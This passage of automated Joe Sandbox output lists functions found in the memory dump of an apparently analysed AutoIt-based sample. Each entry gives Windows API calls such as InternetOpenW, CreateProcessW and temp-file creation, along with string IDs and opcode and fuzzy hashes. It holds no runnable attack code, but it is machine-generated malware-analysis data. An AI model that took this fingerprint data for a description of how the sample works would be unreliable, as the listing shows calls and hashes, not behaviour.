                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CrackInternet_wcslen
                                                                • String ID: |
                                                                • API String ID: 596671847-2343686810
                                                                • Opcode ID: 18d211c4a799619355fb361b34fada199b64f041c88f38b4a39364f50aa80844
                                                                • Instruction ID: 5202152c998dc024829b626151db7a83d615b13db065ba85182a6efc76b21238
                                                                • Opcode Fuzzy Hash: 18d211c4a799619355fb361b34fada199b64f041c88f38b4a39364f50aa80844
                                                                • Instruction Fuzzy Hash: 17313E71D00219EBCF15EFA4CC89AEE7FB9FF04310F000119F915A61A6EB39A956CB50
                                                                APIs
                                                                • DestroyWindow.USER32(?,?,?,?), ref: 007A3621
                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007A365C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$DestroyMove
                                                                • String ID: static
                                                                • API String ID: 2139405536-2160076837
                                                                • Opcode ID: ca927a5e6c6a3912149901566db119be37a6458157d507adfe0bb444fa8b56cf
                                                                • Instruction ID: 2e5b27c41cf8227dffd29bf12271bb8c4234f82a939d0459e84d9ff44fc01ab7
                                                                • Opcode Fuzzy Hash: ca927a5e6c6a3912149901566db119be37a6458157d507adfe0bb444fa8b56cf
                                                                • Instruction Fuzzy Hash: 85319E71500204AEDB14DF78DC85EFB73A9FF89720F009619F8A597280DA39ED91DB60
                                                                APIs
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 007A461F
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A4634
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: '
                                                                • API String ID: 3850602802-1997036262
                                                                • Opcode ID: 534d68ac91c4d9046ea9c4e89b8317e686e2d8f5b2890ef6f209b0b469e7e371
                                                                • Instruction ID: 6afff3624d9148166911c712d7070b223802c96edfe7cdcf1318e16d21980cce
                                                                • Opcode Fuzzy Hash: 534d68ac91c4d9046ea9c4e89b8317e686e2d8f5b2890ef6f209b0b469e7e371
                                                                • Instruction Fuzzy Hash: 49313875E01209AFDF14CFA9C981BDA7BB5FF8A300F10416AE904AB381D7B5A951CF90
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007A327C
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A3287
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID: Combobox
                                                                • API String ID: 3850602802-2096851135
                                                                • Opcode ID: 438d93188bc79f62307dbe72b64fe797c0435ef4c4f51d509394f0e18d68ed1c
                                                                • Instruction ID: ea65e3c8a5a57973b5c92c90f2dcaaa6aad6bc4ddaa8b02f8f3af3ee47ed7686
                                                                • Opcode Fuzzy Hash: 438d93188bc79f62307dbe72b64fe797c0435ef4c4f51d509394f0e18d68ed1c
                                                                • Instruction Fuzzy Hash: 67119371200208BFEF159F54DC85FAB376AEB9A364F104225F914972D0D6399D518760
                                                                APIs
                                                                  • Part of subcall function 0071600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
                                                                  • Part of subcall function 0071600E: GetStockObject.GDI32(00000011), ref: 00716060
                                                                  • Part of subcall function 0071600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A
                                                                • GetWindowRect.USER32(00000000,?), ref: 007A377A
                                                                • GetSysColor.USER32(00000012), ref: 007A3794
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                • String ID: static
                                                                • API String ID: 1983116058-2160076837
                                                                • Opcode ID: 7318cadf632499e8189b08618e2d78f57a29e576389fd2a7e9ffd89cf568127a
                                                                • Instruction ID: fa11b5cf22c88d02201a068dbd63007e2309bbde98d56ed2c8edd5a8bb1413da
                                                                • Opcode Fuzzy Hash: 7318cadf632499e8189b08618e2d78f57a29e576389fd2a7e9ffd89cf568127a
                                                                • Instruction Fuzzy Hash: 711129B2610209AFDB01DFA8CC86EFA7BB8EB49354F004614F955E2250E739E8519B60
                                                                APIs
                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0078CD7D
                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0078CDA6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Internet$OpenOption
                                                                • String ID: <local>
                                                                • API String ID: 942729171-4266983199
                                                                • Opcode ID: 23eb1ed9570b4faf8ac2c9f75059824465fe3ec9d6ae3f43da1040af5018cedf
                                                                • Instruction ID: 463f4eb878316899dff3e79c4896166dad6c4f5176253fcb105cad196e519cde
                                                                • Opcode Fuzzy Hash: 23eb1ed9570b4faf8ac2c9f75059824465fe3ec9d6ae3f43da1040af5018cedf
                                                                • Instruction Fuzzy Hash: 1611C6713856317AD7367B668C45EE7BEACEF527A4F004226B10983180D7789841D7F0
                                                                APIs
                                                                • GetWindowTextLengthW.USER32(00000000), ref: 007A34AB
                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007A34BA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LengthMessageSendTextWindow
                                                                • String ID: edit
                                                                • API String ID: 2978978980-2167791130
                                                                • Opcode ID: e71a227a7ef31687f4dd8a09dae123b879fb3b4b8470097b344812b7c8541f31
                                                                • Instruction ID: 90f656930551082b4b119faeb003ef4396a43ba512ccabcb60a0e474a0b5e277
                                                                • Opcode Fuzzy Hash: e71a227a7ef31687f4dd8a09dae123b879fb3b4b8470097b344812b7c8541f31
                                                                • Instruction Fuzzy Hash: F7118F71500248AFEB128E64DC44AFB376AEB8A374F504324F961971D0C779DC919B55
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • CharUpperBuffW.USER32(?,?,?), ref: 00776CB6
                                                                • _wcslen.LIBCMT ref: 00776CC2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$BuffCharUpper
                                                                • String ID: STOP
                                                                • API String ID: 1256254125-2411985666
                                                                • Opcode ID: 0c658878bc2227d62ee7b7e33d2240da21765c3a5a5fcaeaabd4628da8e8e0bb
                                                                • Instruction ID: 24ed70f7f630d64623b533327e4a6c6a7677b8696e8339268bb5f2c678f05bcb
                                                                • Opcode Fuzzy Hash: 0c658878bc2227d62ee7b7e33d2240da21765c3a5a5fcaeaabd4628da8e8e0bb
                                                                • Instruction Fuzzy Hash: F00104326109268BCF21AFBDCC959BF73B4EB61790B104924E95696198EB39E940C660
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA
                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00771D4C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_wcslen
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 624084870-1403004172
                                                                • Opcode ID: 2445998dfe2291e4ad6db3ef12535f27a3db37a321a6fb3532619ee70f0a8c9c
                                                                • Instruction ID: 69c92790b0bcb1104e06ef9ac6d4481c8ffb5b46439baf49c7dd1f8b68c2fa46
                                                                • Opcode Fuzzy Hash: 2445998dfe2291e4ad6db3ef12535f27a3db37a321a6fb3532619ee70f0a8c9c
                                                                • Instruction Fuzzy Hash: 4F01B571701214ABCF14EBA8CC56DFE7368EB463D0B44491AB976673C1EA3859099B60
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA
                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00771C46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_wcslen
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 624084870-1403004172
                                                                • Opcode ID: a68396ff686554c1f5e46b75b2af2646e5abaaba08c942f6bdc6bd2bba1f6165
                                                                • Instruction ID: 129d64a83cb6244f6c32aab7bddae2157c9f5daaea8f72d32fc551fe87b6367a
                                                                • Opcode Fuzzy Hash: a68396ff686554c1f5e46b75b2af2646e5abaaba08c942f6bdc6bd2bba1f6165
                                                                • Instruction Fuzzy Hash: 7701FCB1740104A7CF05EBE8C966DFF73A89B113C0F604016B91A772C1EA2C9F0897B1
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA
                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00771CC8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_wcslen
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 624084870-1403004172
                                                                • Opcode ID: 365ce1cf0b631a3c2b79e0c81dbc55dd4220c5084aaae413a4452ba398f250ec
                                                                • Instruction ID: da9a49bf8b4d7ed003c0939d17457ca0d2e050432408e79c4e1d7c123339ac3a
                                                                • Opcode Fuzzy Hash: 365ce1cf0b631a3c2b79e0c81dbc55dd4220c5084aaae413a4452ba398f250ec
                                                                • Instruction Fuzzy Hash: 4C01DBB1640114A7CF05EBE8CA16EFE73A89B113C0F544016B946732C1EA2C9F19D7B1
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0072A529
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Init_thread_footer_wcslen
                                                                • String ID: ,%~$3yv
                                                                • API String ID: 2551934079-3390321579
                                                                • Opcode ID: ee2aa26224e47d9ae238ad3786868a8a9e1245bf8711ec701377a42423b699ae
                                                                • Instruction ID: f405149cb9050602bf3e4342352e4b433efcf8b53462caaf1f6788e99cc0f2ae
                                                                • Opcode Fuzzy Hash: ee2aa26224e47d9ae238ad3786868a8a9e1245bf8711ec701377a42423b699ae
                                                                • Instruction Fuzzy Hash: CE012B32701664EBD604F77DE86FA9E7368DB09710F400068FA025B1C3EE5C9D528AD7
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 00773CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00773CCA
                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00771DD3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassMessageNameSend_wcslen
                                                                • String ID: ComboBox$ListBox
                                                                • API String ID: 624084870-1403004172
                                                                • Opcode ID: 4894366624a81e99c17e0deba0711032210ff34f1198b7586982ca8d269735fd
                                                                • Instruction ID: c34d5a896fa642456b8fd4cae93da0570fb5490ccf379cceb70a5102b0b8e3d4
                                                                • Opcode Fuzzy Hash: 4894366624a81e99c17e0deba0711032210ff34f1198b7586982ca8d269735fd
                                                                • Instruction Fuzzy Hash: A3F0A4B1B41214A7DF14EBA8CC66FFE7778AB02390F440916B966632C1DA685A0987B0
                                                                APIs
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007E3018,007E305C), ref: 007A81BF
                                                                • CloseHandle.KERNEL32 ref: 007A81D1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateHandleProcess
                                                                • String ID: \0~
                                                                • API String ID: 3712363035-4061946894
                                                                • Opcode ID: 5729a2ea275749d0f49f96b11ad2740093a3c3997819acb68cfbc56149204c7d
                                                                • Instruction ID: 4e35c462da9ddf2d1b9476e6a7bf69fe21d82da324afbb4fcc5ebea9d1432271
                                                                • Opcode Fuzzy Hash: 5729a2ea275749d0f49f96b11ad2740093a3c3997819acb68cfbc56149204c7d
                                                                • Instruction Fuzzy Hash: 01F054B1641354BAF6206761AC4DFB73A5DDB09750F008461BB08DA1A2D67D8A0082BD
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: 3, 3, 16, 1
                                                                • API String ID: 176396367-3042988571
                                                                • Opcode ID: bb540ef7a9207bf98e9b4d026d40d979086a4606e85ce9f5ea8cbfe8531bdfae
                                                                • Instruction ID: 332c9b4072a4b9f4be3bbb043835d7c53d6003edd04b41341b1729bc571e8672
                                                                • Opcode Fuzzy Hash: bb540ef7a9207bf98e9b4d026d40d979086a4606e85ce9f5ea8cbfe8531bdfae
                                                                • Instruction Fuzzy Hash: 5BE02B422242A060A73D1279BCC5B7F5789CFC9760B14182BF985C2277EA9CAD91D3A0
                                                                APIs
                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00770B23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Message
                                                                • String ID: AutoIt$Error allocating memory.
                                                                • API String ID: 2030045667-4017498283
                                                                • Opcode ID: 819bd0cd2753f949a533c43ceb1226938407749888c87a0a224d72f12b27ebaf
                                                                • Instruction ID: 3831991b6418f235d5b1f65dc34bfb0320a7b429187b51b34f2e199cffee67f0
                                                                • Opcode Fuzzy Hash: 819bd0cd2753f949a533c43ceb1226938407749888c87a0a224d72f12b27ebaf
                                                                • Instruction Fuzzy Hash: 96E0D871384318B6D21537547C0BF897A948F06B60F104477F748555C38EE9789046E9
                                                                APIs
                                                                  • Part of subcall function 0072F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00730D71,?,?,?,0071100A), ref: 0072F7CE
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,0071100A), ref: 00730D75
                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0071100A), ref: 00730D84
                                                                Strings
                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00730D7F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                • API String ID: 55579361-631824599
                                                                • Opcode ID: 92915eb79251d266fd433f26656644407375c4b3f8d713728bb1add795f49f67
                                                                • Instruction ID: 15e84ceb889e70ac65a57bc85efc55f0a0d91d75a1c319ef4d23671f6945dee6
                                                                • Opcode Fuzzy Hash: 92915eb79251d266fd433f26656644407375c4b3f8d713728bb1add795f49f67
                                                                • Instruction Fuzzy Hash: 5EE06D702003518BE3209FBCE8183467BE0BB05740F008A3DE482C6692DBBCE4848BD1
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0072E3D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Init_thread_footer
                                                                • String ID: 0%~$8%~
                                                                • API String ID: 1385522511-2129309850
                                                                • Opcode ID: 5c7d60a4a052f815c9db1d0352c9ebcd1a8e1711903adc8b26cbf13de5b59c84
                                                                • Instruction ID: 35b48ed76a4d41f1d959aec5dc0e07f949a05d8caa7cf9f28ab6f7bfde5dc701
                                                                • Opcode Fuzzy Hash: 5c7d60a4a052f815c9db1d0352c9ebcd1a8e1711903adc8b26cbf13de5b59c84
                                                                • Instruction Fuzzy Hash: 92E0863141AAB4CBD604D718BAA9A8C3359AB0D321B5051F9E1128B1D7DBBC28538699
                                                                APIs
                                                                • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0078302F
                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00783044
                                                                Strings
                                                                Memory Dump Source
